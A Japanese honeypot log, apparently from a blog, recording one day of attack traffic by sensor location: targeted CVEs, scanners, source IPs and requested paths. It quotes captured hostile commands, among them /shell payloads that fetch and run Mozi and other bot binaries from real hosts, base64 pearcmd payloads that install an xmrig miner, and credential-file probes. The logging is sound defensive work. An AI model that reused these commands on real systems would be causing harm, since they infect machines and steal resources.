2023/09/28 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/09/28分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為

Location:JP

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
aiohttpによるスキャン行為
.sqlへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 80.91.223.136/reallynightmare.sh;
chmod 777 *;
sh reallynightmare.sh?jaws

cd /tmp;
rm -rf *;
wget http://5.59.107.34:52471/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:US

Amcrest Deviceの脆弱性(CVE-2017-8226)を狙うアクセス
Netis WF2419の脆弱性(CVE-2019-19356)を狙うアクセス
CensysInspectによるスキャン行為

を確認しました。

Location:UK

Amcrest Deviceの脆弱性(CVE-2017-8226)を狙うアクセス
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
Netis WF2419の脆弱性(CVE-2019-19356)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Sunhillo SureLineの脆弱性(CVE-2021-36380)を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
l9scanによるスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信

を確認しました。

Location:SG

Amcrest Deviceの脆弱性(CVE-2017-8226)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  95.214.24.125/jaws;
sh /tmp/jaws

他

アクセス数推移

JP：総アクセス数：561 (前日比：46)
US：総アクセス数：95 (前日比：-11)
UK：総アクセス数：190 (前日比：51)
SG：総アクセス数：82 (前日比：-138)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.246.202.41	United States
1	5.59.107.34	Czechia
2	20.107.242.111	United States
1	34.78.196.65	United States
8	34.204.175.149	United States
142	35.93.56.253	United States
1	40.86.174.108	United States
15	43.154.141.71	Singapore
1	45.56.108.128	United States
1	45.79.172.21	United States
1	45.79.181.223	United States
2	47.254.74.59	United States
85	52.25.147.154	United States
207	54.218.109.249	United States
1	65.49.1.27	United States
1	66.240.205.34	United States
2	74.82.47.2	United States
1	95.214.55.115	Poland
1	104.192.0.50	United States
2	109.237.97.180	Russia
1	109.237.98.197	Russia
2	118.193.58.75	Hong Kong
2	134.122.118.79	United States
1	135.125.217.54	France
5	135.125.244.48	France
6	135.125.246.189	France
1	138.68.170.249	United States
1	139.59.119.46	Singapore
1	142.93.212.191	United States
1	143.42.22.224	United States
1	159.203.109.50	United States
14	164.52.36.213	China
4	165.22.85.145	United States
6	165.154.51.221	Hong Kong
1	165.227.56.50	United States
1	172.104.11.4	United States
1	172.105.128.12	United States
1	172.105.128.13	United States
16	185.180.143.141	Portugal
4	185.216.71.70	Bulgaria
1	185.230.124.70	Romania
2	185.254.196.173	Ukraine
6	185.254.196.186	Ukraine
1	192.155.90.118	United States
1	193.35.18.31	Bulgaria
1	193.35.18.187	Bulgaria
1	193.42.33.176	Bulgaria
1	194.180.48.50	Bulgaria
1	198.235.24.35	United States

UserAgent一覧

件数	UserAgent
28	`-`
3	`Custom-HttpClient`
2	`Go-http-client/1.1`
2	`Hello, world`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
140	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
16	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36`
15	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.3`
1	`Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (Windows NT 8_2; Win64; x64) AppleWebKit/596.43 (KHTML, like Gecko) Chrome/65.0.1651 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 9_0_2; Win64; x64) AppleWebKit/558.55 (KHTML, like Gecko) Chrome/100.0.203 Safari/537.36`
313	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/541.39 (KHTML, like Gecko) Chrome/59.0.1749 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (iPad; CPU OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1`
4	`Mozilla/5.0 zgrab/0.x`
2	`Python/3.7 aiohttp/3.7.4.post0`
1	`SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http[:]//www[.]google[.]com/bot.html)`
2	`python-requests/2.25.1`
4	`python-requests/2.28.2`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`Gh0st\xad`
1		`\x16\x03\x01\x01H\x01`
3		`\x16\x03\x01\x01`	\x01
19		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/.aws.sh`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.codeship.yaml`	HTTP/1.1
1	GET	`/.codeship.yml`	HTTP/1.1
1	GET	`/.dockerfunc`	HTTP/1.1
3	GET	`/.env.development`	HTTP/1.1
3	GET	`/.env.dist`	HTTP/1.1
3	GET	`/.env.old`	HTTP/1.1
3	GET	`/.env.prod`	HTTP/1.1
3	GET	`/.env.production`	HTTP/1.1
3	GET	`/.env.project`	HTTP/1.1
3	GET	`/.env.save`	HTTP/1.1
27	GET	`/.env`	HTTP/1.1
6	GET	`/.git/config`	HTTP/1.1
1	GET	`/.jenkins.sh`	HTTP/1.1
3	GET	`/.json`	HTTP/1.1
1	GET	`/.travis.sh`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
2	GET	`/?phpinfo=1`	HTTP/1.1
1	GET	`/Build.bat`	HTTP/1.1
1	GET	`/PHPConf.php`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/Server.php`	HTTP/1.1
1	GET	`/Server.txt`	HTTP/1.1
1	GET	`/Server/`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
5	GET	`/Temporary_Listen_Addresses/`	HTTP/1.1
1	GET	`/_phpinfo.php`	HTTP/1.1
3	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
3	GET	`/admin-app/.env`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/admin/config.php`	HTTP/1.1
1	GET	`/admin/phpinfo.php`	HTTP/1.1
4	GET	`/api/.env`	HTTP/1.1
1	GET	`/api/session/properties`	HTTP/1.1
3	GET	`/app/.env`	HTTP/1.1
3	GET	`/application/.env`	HTTP/1.1
3	GET	`/apps/.env`	HTTP/1.1
1	GET	`/aws-credentials.sh`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
3	GET	`/back/.env`	HTTP/1.1
1	GET	`/bin/config.sh`	HTTP/1.1
1	GET	`/build.local.xml`	HTTP/1.1
1	GET	`/build.log`	HTTP/1.1
1	GET	`/build.properties`	HTTP/1.1
2	GET	`/build.sh`	HTTP/1.1
1	GET	`/build.xml`	HTTP/1.1
1	GET	`/build_docker.sh`	HTTP/1.1
1	GET	`/builds.sh`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
3	GET	`/cms/.env`	HTTP/1.1
1	GET	`/common.sh`	HTTP/1.1
1	GET	`/conf.html`	HTTP/1.1
1	GET	`/conf.inc.php~`	HTTP/1.1
1	GET	`/conf.php.bak`	HTTP/1.1
1	GET	`/conf.php.old`	HTTP/1.1
1	GET	`/conf.php.swp`	HTTP/1.1
1	GET	`/conf.sh`	HTTP/1.1
1	GET	`/conf.swp`	HTTP/1.1
1	GET	`/config.bak`	HTTP/1.1
1	GET	`/config.codekit3`	HTTP/1.1
1	GET	`/config.codekit`	HTTP/1.1
1	GET	`/config.core`	HTTP/1.1
1	GET	`/config.dat`	HTTP/1.1
1	GET	`/config.guess`	HTTP/1.1
1	GET	`/config.h.in`	HTTP/1.1
1	GET	`/config.hash`	HTTP/1.1
1	GET	`/config.inc.bak`	HTTP/1.1
1	GET	`/config.inc.old`	HTTP/1.1
1	GET	`/config.inc.php.txt`	HTTP/1.1
1	GET	`/config.inc.php`	HTTP/1.1
1	GET	`/config.inc.php~`	HTTP/1.1
1	GET	`/config.inc.txt`	HTTP/1.1
1	GET	`/config.inc`	HTTP/1.1
1	GET	`/config.inc~`	HTTP/1.1
1	GET	`/config.ini.bak`	HTTP/1.1
1	GET	`/config.ini.old`	HTTP/1.1
1	GET	`/config.ini.txt`	HTTP/1.1
1	GET	`/config.ini`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json.BAK`	HTTP/1.1
1	GET	`/config.json.bak`	HTTP/1.1
1	GET	`/config.json.cfm`	HTTP/1.1
4	GET	`/config.json`	HTTP/1.1
1	GET	`/config.local.php_old`	HTTP/1.1
1	GET	`/config.local.php~`	HTTP/1.1
1	GET	`/config.local`	HTTP/1.1
1	GET	`/config.old`	HTTP/1.1
1	GET	`/config.php-eb`	HTTP/1.1
1	GET	`/config.php.bak`	HTTP/1.1
1	GET	`/config.php.bkp`	HTTP/1.1
1	GET	`/config.php.dist`	HTTP/1.1
1	GET	`/config.php.inc`	HTTP/1.1
1	GET	`/config.php.inc~`	HTTP/1.1
1	GET	`/config.php.new`	HTTP/1.1
1	GET	`/config.php.old`	HTTP/1.1
1	GET	`/config.php.save`	HTTP/1.1
1	GET	`/config.php.swp`	HTTP/1.1
1	GET	`/config.php.txt`	HTTP/1.1
1	GET	`/config.php.zip`	HTTP/1.1
1	GET	`/config.php`	HTTP/1.1
1	GET	`/config.php~`	HTTP/1.1
1	GET	`/config.properties`	HTTP/1.1
1	GET	`/config.rb`	HTTP/1.1
1	GET	`/config.ru`	HTTP/1.1
1	GET	`/config.sh`	HTTP/1.1
1	GET	`/config.source`	HTTP/1.1
1	GET	`/config.sql`	HTTP/1.1
1	GET	`/config.sub`	HTTP/1.1
1	GET	`/config.swp`	HTTP/1.1
1	GET	`/config.txt`	HTTP/1.1
1	GET	`/config.xml`	HTTP/1.1
1	GET	`/config.yml`	HTTP/1.1
1	GET	`/config/AppData.config`	HTTP/1.1
1	GET	`/config/app.php`	HTTP/1.1
1	GET	`/config/app.yml`	HTTP/1.1
1	GET	`/config/config.inc`	HTTP/1.1
1	GET	`/config/config.ini`	HTTP/1.1
1	GET	`/config/settings.inc`	HTTP/1.1
1	GET	`/config/settings.ini.cfm`	HTTP/1.1
1	GET	`/config/settings.ini`	HTTP/1.1
1	GET	`/config/settings.local.yml`	HTTP/1.1
1	GET	`/configure.sh`	HTTP/1.1
3	GET	`/core/.env`	HTTP/1.1
2	GET	`/cp/.env`	HTTP/1.1
1	GET	`/cron.sh`	HTTP/1.1
1	GET	`/debug-output.txt`	HTTP/1.1
1	GET	`/debug.cgi`	HTTP/1.1
1	GET	`/debug.inc`	HTTP/1.1
1	GET	`/debug.log`	HTTP/1.1
1	GET	`/debug.php`	HTTP/1.1
1	GET	`/debug.py`	HTTP/1.1
1	GET	`/debug.txt`	HTTP/1.1
1	GET	`/debug.xml`	HTTP/1.1
3	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/debug`	HTTP/1.1
1	GET	`/demo.sh`	HTTP/1.1
1	GET	`/dev.sh`	HTTP/1.1
3	GET	`/development/.env`	HTTP/1.1
1	GET	`/docker.sh`	HTTP/1.1
3	GET	`/docker/.env`	HTTP/1.1
1	GET	`/docker_run.sh`	HTTP/1.1
2	GET	`/dump.sh`	HTTP/1.1
1	GET	`/env.bak`	HTTP/1.1
3	GET	`/enviroments/.env.production`	HTTP/1.1
3	GET	`/enviroments/.env`	HTTP/1.1
1	GET	`/favicon-32x32.png`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/fedex/.env`	HTTP/1.1
3	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/gate.php`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/global.asa.bak`	HTTP/1.1
1	GET	`/global.asa.old`	HTTP/1.1
1	GET	`/global.asa.orig`	HTTP/1.1
1	GET	`/global.asa.temp`	HTTP/1.1
1	GET	`/global.asa.tmp`	HTTP/1.1
1	GET	`/global.asa`	HTTP/1.1
1	GET	`/global.asax.bak`	HTTP/1.1
1	GET	`/global.asax.old`	HTTP/1.1
1	GET	`/global.asax.orig`	HTTP/1.1
1	GET	`/global.asax.temp`	HTTP/1.1
1	GET	`/global.asax.tmp`	HTTP/1.1
1	GET	`/global.asax`	HTTP/1.1
1	GET	`/global.php`	HTTP/1.1
1	GET	`/globaladmin`	HTTP/1.1
1	GET	`/globaladminv2`	HTTP/1.1
1	GET	`/globals.inc`	HTTP/1.1
1	GET	`/globals.jsa`	HTTP/1.1
1	GET	`/globals`	HTTP/1.1
1	GET	`/globes_admin/`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../tmp/ohhellohttpserver`	HTTP/1.1
1	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode(\"bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==\"));?>+/tmp/ohhellohttpserver.php`	HTTP/1.1
1	GET	`/index.php?s=/index/ hink`
1	GET	`/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=echo${IFS}bWtkaXIgLXAgL3RtcC8kKHdob2FtaSkgJiYgY2QgL3RtcC8kKHdob2FtaSk7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyB3Z2V0IGh0dHA6Ly8xODUuMjI1Ljc1LjI0Mi9kb3dubG9hZC94bXJpZy54ODZfNjQ7IHJtIC1yZiAuZm94bTsgbXYgeG1yaWcueDg2XzY0IC5mb3htOyBjaG1vZCAreCAuZm94bTsgLi8uZm94bQ==\|base64${IFS}-d\|sh`	HTTP/1.1
3	GET	`/info.php`	HTTP/1.1
1	GET	`/info/info.php`	HTTP/1.1
1	GET	`/info/phpinfo.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/information.php`	HTTP/1.1
1	GET	`/information`	HTTP/1.1
3	GET	`/laravel/.env`	HTTP/1.1
3	GET	`/live_env`	HTTP/1.1
2	GET	`/local/.env`	HTTP/1.1
1	GET	`/login.sh`	HTTP/1.1
1	GET	`/main.js`	HTTP/1.1
1	GET	`/main.json`	HTTP/1.1
1	GET	`/main.sh`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.core`	HTTP/1.1
1	GET	`/php.ini-orig.txt`	HTTP/1.1
1	GET	`/php.ini.sample`	HTTP/1.1
1	GET	`/php.ini_`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.ini~`	HTTP/1.1
1	GET	`/php.lnk`	HTTP/1.1
1	GET	`/php.log`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/php/dev/`	HTTP/1.1
1	GET	`/php/php.cgi`	HTTP/1.1
1	GET	`/php4.ini`	HTTP/1.1
1	GET	`/php5.fcgi`	HTTP/1.1
1	GET	`/php5.ini`	HTTP/1.1
1	GET	`/php_info.php`	HTTP/1.1
3	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpinformation`	HTTP/1.1
1	GET	`/phptest.php`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/plugin.xml`	HTTP/1.1
1	GET	`/printenv.tmp`	HTTP/1.1
3	GET	`/private/.env`	HTTP/1.1
2	GET	`/rest/.env`	HTTP/1.1
1	GET	`/robot.txt`	HTTP/1.1
1	GET	`/robots.txt.dist`	HTTP/1.1
4	GET	`/robots.txt`	HTTP/1.1
1	GET	`/run.sh`	HTTP/1.1
1	GET	`/sample.txt`	HTTP/1.1
1	GET	`/sample.txt~`	HTTP/1.1
3	GET	`/script/.env`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/scripts/phpinfo.php`	HTTP/1.1
1	GET	`/secrets.sh`	HTTP/1.1
1	GET	`/serv-u.ini`	HTTP/1.1
1	GET	`/server-info`	HTTP/1.1
1	GET	`/server-status/`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/server.cert`	HTTP/1.1
1	GET	`/server.cfg`	HTTP/1.1
1	GET	`/server.js`	HTTP/1.1
1	GET	`/server.key`	HTTP/1.1
1	GET	`/server.log`	HTTP/1.1
1	GET	`/server.ovpn`	HTTP/1.1
1	GET	`/server.pid`	HTTP/1.1
1	GET	`/server.sh`	HTTP/1.1
2	GET	`/server.xml`	HTTP/1.1
1	GET	`/server/config.json`	HTTP/1.1
1	GET	`/server/server.js`	HTTP/1.1
1	GET	`/service.asmx`	HTTP/1.1
1	GET	`/service.grp`	HTTP/1.1
1	GET	`/service.pwd`	HTTP/1.1
1	GET	`/settings.html`	HTTP/1.1
1	GET	`/settings.php.bak`	HTTP/1.1
1	GET	`/settings.php.dist`	HTTP/1.1
1	GET	`/settings.php.old`	HTTP/1.1
1	GET	`/settings.php.save`	HTTP/1.1
1	GET	`/settings.php.swp`	HTTP/1.1
1	GET	`/settings.php.txt`	HTTP/1.1
1	GET	`/settings.php`	HTTP/1.1
1	GET	`/settings.php~`	HTTP/1.1
1	GET	`/settings.py`	HTTP/1.1
1	GET	`/settings.xml`	HTTP/1.1
1	GET	`/setup.data`	HTTP/1.1
1	GET	`/setup.log`	HTTP/1.1
1	GET	`/setup.php`	HTTP/1.1
1	GET	`/setup.sql`	HTTP/1.1
1	GET	`/sftp-config.json`	HTTP/1.1
1	GET	`/sh.sh`	HTTP/1.1
3	GET	`/shared/.env`	HTTP/1.1
1	GET	`/shell.sh`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+;wget+80[.]91[.]223[.]136/reallynightmare.sh;chmod+777+;sh+reallynightmare[.]sh?jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//5[.]59[.]107[.]34:52471/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/showLogin.cc`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
3	GET	`/sources/.env`	HTTP/1.1
1	GET	`/src/`	HTTP/1.1
1	GET	`/src/app.js`	HTTP/1.1
1	GET	`/src/index.js`	HTTP/1.1
1	GET	`/src/server.js`	HTTP/1.1
3	GET	`/start.sh`	HTTP/1.1
1	GET	`/startup.cfg`	HTTP/1.1
2	GET	`/startup.sh`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/static/historypage.js`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
3	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/testphpinfo.php`	HTTP/1.1
1	GET	`/testphpinfo`	HTTP/1.1
1	GET	`/user-data.txt.i`	HTTP/1.1
1	GET	`/user-data.txt`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/viewinfo.php`	HTTP/1.1
1	GET	`/web.config.tmp`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`/~apache`	HTTP/1.1
1	GET	`/~backup`	HTTP/1.1
15	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	POST	`/.aws/credentials`	HTTP/1.1
3	POST	`/.env.development`	HTTP/1.1
3	POST	`/.env.dist`	HTTP/1.1
3	POST	`/.env.old`	HTTP/1.1
3	POST	`/.env.prod`	HTTP/1.1
3	POST	`/.env.production`	HTTP/1.1
3	POST	`/.env.project`	HTTP/1.1
3	POST	`/.env.save`	HTTP/1.1
3	POST	`/.env`	HTTP/1.1
3	POST	`/admin-app/.env`	HTTP/1.1
3	POST	`/api/.env`	HTTP/1.1
3	POST	`/app/.env`	HTTP/1.1
3	POST	`/application/.env`	HTTP/1.1
3	POST	`/apps/.env`	HTTP/1.1
3	POST	`/back/.env`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
3	POST	`/cms/.env`	HTTP/1.1
3	POST	`/core/.env`	HTTP/1.1
2	POST	`/cp/.env`	HTTP/1.1
3	POST	`/development/.env`	HTTP/1.1
3	POST	`/docker/.env`	HTTP/1.1
3	POST	`/enviroments/.env.production`	HTTP/1.1
3	POST	`/enviroments/.env`	HTTP/1.1
2	POST	`/fedex/.env`	HTTP/1.1
3	POST	`/laravel/.env`	HTTP/1.1
3	POST	`/live_env`	HTTP/1.1
2	POST	`/local/.env`	HTTP/1.1
1	POST	`/login`	HTTP/1.1
3	POST	`/private/.env`	HTTP/1.1
2	POST	`/rest/.env`	HTTP/1.1
3	POST	`/script/.env`	HTTP/1.1
3	POST	`/shared/.env`	HTTP/1.1
3	POST	`/sources/.env`	HTTP/1.1
3	POST	`/system/.env`	HTTP/1.1
1	t3	`12.1.2\n`

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	35.241.146.40	United States
2	37.19.221.32	United Kingdom
30	43.158.217.52	Singapore
2	45.33.80.243	United States
1	45.79.181.104	United States
1	45.88.90.111	Bulgaria
1	45.88.90.113	Bulgaria
1	45.88.90.116	Bulgaria
2	54.36.115.221	France
12	54.37.79.75	France
1	64.62.197.18	United States
1	64.62.197.25	United States
1	71.6.134.234	United States
2	74.50.79.238	United States
1	95.214.55.115	Poland
1	106.75.141.91	China
2	109.237.97.180	Russia
2	109.237.98.226	Russia
2	120.63.180.123	India
2	134.122.118.79	United States
1	143.198.209.161	United States
1	146.70.38.80	Romania
1	157.245.144.50	United States
2	162.142.125.222	United States
2	167.94.138.49	United States
1	172.96.172.158	United States
2	172.104.11.4	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
2	172.105.128.11	United States
1	172.105.128.13	United States
1	184.105.247.254	United States
2	193.32.162.174	Romania
3	193.35.18.187	Bulgaria
1	193.42.33.176	Bulgaria
1	194.180.48.50	Bulgaria
1	194.180.49.75	Bulgaria
1	198.235.24.134	United States
1	205.210.31.50	United States
1	206.189.137.49	United States

UserAgent一覧

件数	UserAgent
20	`'Mozilla/5.0`
20	`-`
2	`Dark`
3	`Go-http-client/1.1`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 (Edition Yx 05)`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101`
17	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
7	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`Mozilla_33741328`
2	`Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`\x16\x03\x01\x01H\x01`
16		`\x16\x03\x01`
3	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account2`	HTTP/1.1
20	GET	`/.env`	HTTP/1.1
1	GET	`/8.bin`	HTTP/1.1
1	GET	`/Display/chan/IB61I7MYA`	HTTP/1.1
1	GET	`/Gmail/UnityPlayer.txt`	HTTP/1.1
1	GET	`/Ki7q`	HTTP/1.1
1	GET	`/SKnP`	HTTP/1.1
3	GET	`/Temporary_Listen_Addresses/`	HTTP/1.1
1	GET	`/UnityPlayer.dll`	HTTP/1.1
2	GET	`/Visu/ens/events`	HTTP/1.1
